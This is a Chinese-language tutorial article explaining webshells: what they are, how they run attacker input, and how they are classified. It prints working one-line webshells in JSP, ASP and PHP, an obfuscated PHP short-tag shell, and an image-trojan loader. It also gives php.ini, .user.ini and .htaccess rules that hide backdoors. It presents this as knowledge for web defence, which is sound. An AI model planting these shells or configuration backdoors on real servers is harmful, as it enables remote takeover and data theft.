当前位置: 首页 > 工具软件 > webshell > 使用案例 >

什么事webshell?

叶经略
2023-12-01

1、什么是webshell

    webshell是web入侵的脚本攻击工具。

    简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

    为了更好理解webshell我们学习两个概念:

    什么是“木马”?

    “木马”全称是“特洛伊木马(Trojan<BR>Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。

    在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载 (Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。

    什么是后门?

    大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535 扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

    webshell的优点

    webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

2、webshell的原理

①可执行脚本 

HTTP数据包($_GET、$_POST、$_COOKIES、$_SERVER[args]等)

②数据传递

③执行传递的数据 

a.直接执行(eval、system、passthru等) 

b.文件包含执行(include、require等) 

c.动态函数执行($a="phpinfo";$a();) 

d.Curly Syntax执行(${‘ls’}) 

e.preg_replace(第一个参数存在’/e’) 

f.ob_start函数 

g.回调函数(array_map等) 

h.反序列化(unserialize等)

 

3、webshell的分类

①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) 
②根据脚本名称分类:jsp、asp、aspx、php 

jsp的简单的webshell:

1

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

asp的简单的webshell:

1

success!!!!<%eval request("cmd")%>

php的简单的webshell:

1

2

3

4

<?php

    $a=exec($_GET["input"]);    

    echo $a;

?>

 

4、webshell的常见类型

①php.ini隐藏后门

1

2

auto_prepend_file="/tmp/caidao.php"

auto_append_file="/tmp/caidao.php"

这两种都是相当于在php脚本头部include。 
注:auto_prepend_file 与 auto_append_file 只能require一个php文件,但在这个php文件内可以require多个其他的php文件。 

②.htaccess构成php后门

1

2

3

4

5

<FilesMatch "abc.jpg">//上传特定的文件只把它解析成为php

 

SetHandler application/x-httpd-php

 

</FilesMatch>

1

2

3

4

5

php_flag engine

AddHandler(AddHander php5-script .logs)

AddType application/x-httpd-php .png

SetHandler(<FilesMatch “_php.gif”>SetHandler application/x-httpd-php</FilesMatch>)

php_value auto_append_file /tmp/caidao.php

③user.ini隐藏后门(不需重启)

除了主php.ini之外,PHP还会在每个目录下扫描ini文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的PHP文件在web根目录之外,则只扫描该目录。利用方式与php.ini相似。

1

2

auto_prepend_file="/tmp/caidao.php"  相当于在php脚本头部include

auto_append_file="/tmp/caidao.php"   相当于在php脚本底部include

④PHP代码开启标志缩写

将php.ini的short_open_tag参数设为On

1

<?=($_=@$_GET[2]).@$_($_GET[1])?>

⑤图片木马

1

2

3

4

<?php

    $wp__theme_icon=create_function('',file_get_contents('hacker.gif'));    

    $wp__theme_icon();

?>

注:这种方法不允许图片中有非法数据。

    只有了解了webshell的特点,才能已最小的代价高效的做好web防御。

 类似资料: